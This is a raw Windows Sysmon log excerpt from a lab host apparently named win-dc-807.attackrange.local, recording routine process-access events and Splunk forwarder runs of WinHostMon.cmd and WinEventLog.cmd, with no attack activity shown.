15:51:20.488{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002155Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:20.488{D28789B6-7C62-5FA1-0500-000000008801}6441152C:\Windows\system32\csrss.exe{D28789B6-7C78-5FA1-6100-000000008801}4080C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002154Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:20.488{D28789B6-7C73-5FA1-3300-000000008801}26763952C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{D28789B6-7C78-5FA1-6100-000000008801}4080C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7d35e7|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7cdcb9|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca4ec|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca0a3|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7c9f0d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6d7908|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6de2ee|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b29fa|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b4274|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e42dc|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ec682|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002153Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:20.491{D28789B6-7C78-5FA1-6100-000000008801}4080C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\WinHostMon.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{D28789B6-7C73-5FA1-3300-000000008801}2676C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000002152Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:20.378{D28789B6-7C74-5FA1-3F00-000000008801}39563976C:\Windows\system32\conhost.exe{D28789B6-7C78-5FA1-6000-000000008801}3924C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002151Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:20.378{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002150Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:20.378{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002149Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:20.378{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002148Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:20.378{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002147Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:20.378{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002146Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:20.378{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002145Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:20.378{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002144Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:20.378{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002143Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:20.378{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002142Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:20.378{D28789B6-7C62-5FA1-0500-000000008801}6441152C:\Windows\system32\csrss.exe{D28789B6-7C78-5FA1-6000-000000008801}3924C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002141Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:20.378{D28789B6-7C73-5FA1-3300-000000008801}26763952C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{D28789B6-7C78-5FA1-6000-000000008801}3924C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7d35e7|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7cdcb9|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca4ec|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca0a3|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7c9f0d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6d7908|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6de2ee|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b29fa|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b4274|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e42dc|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ec682|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002140Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:20.382{D28789B6-7C78-5FA1-6000-000000008801}3924C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\WinEventLog.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{D28789B6-7C73-5FA1-3300-000000008801}2676C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000002139Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:20.269{D28789B6-7C74-5FA1-3F00-000000008801}39563976C:\Windows\system32\conhost.exe{D28789B6-7C78-5FA1-5F00-000000008801}3184C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002138Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:20.269{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002137Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:20.269{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002136Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:20.269{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002135Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:20.269{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002134Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:20.269{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002133Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:20.269{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002132Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:20.269{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002131Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:20.269{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002130Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 